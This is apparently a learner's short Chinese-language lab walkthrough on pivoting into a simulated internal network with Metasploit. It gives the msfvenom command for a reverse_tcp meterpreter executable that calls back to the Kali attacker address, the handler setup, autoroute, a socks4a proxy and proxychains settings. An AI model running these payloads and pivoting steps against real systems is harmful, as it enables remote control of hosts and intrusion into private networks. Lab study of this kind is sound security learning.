准備環境:攻擊機kali:192.168.1.104 靶機:win2008 :192.168.1.103 192.168.137.130(模擬內網ip)
使用msfvenom生成一個木馬,msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -f exe > 1.exe(我的win2008是64位的)
接下來打開msfconsole模塊
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
接下來就是給靶機添加路由了
使用run autoroute -p可以查看路由,然后就返回到上一層就行socks4a綁定
msf設置完畢,就開始對kali本身的代理規則進行設置
修改vim /etc/proxychains.conf,改成socks4
全部設置好后,即可以使用proxychains進行代理
個人目前在學習中,有些知識點可能個人理解有誤,望大佬勿噴哈,